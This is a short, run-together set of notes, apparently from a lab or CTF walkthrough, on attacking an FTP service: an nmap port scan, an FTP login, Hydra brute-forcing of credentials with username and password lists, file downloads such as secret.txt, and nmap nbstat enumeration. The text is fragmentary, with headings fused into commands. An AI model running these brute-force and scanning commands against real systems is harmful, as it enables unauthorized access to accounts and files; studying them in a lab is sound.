Aug 9, 2024
Identifying Targets
nmap -p 21 <target-ip>.Connecting to FTP
ftp <target-ip>.roottourBrute Forcing Login Credentials
-l (single username)-L (list of usernames)-p (single password)-P (list of passwords)hydra -L <usernames.txt> -P <passwords.txt> ftp://<target-ip>./usr/share/wordlists/.Accessing Files via FTP
get <filename> to download files.get secret.txt to download a file.Using Nmap for Enumeration
nmap -sV --script nbstat <target-ip> to discover services and versions.Understanding Output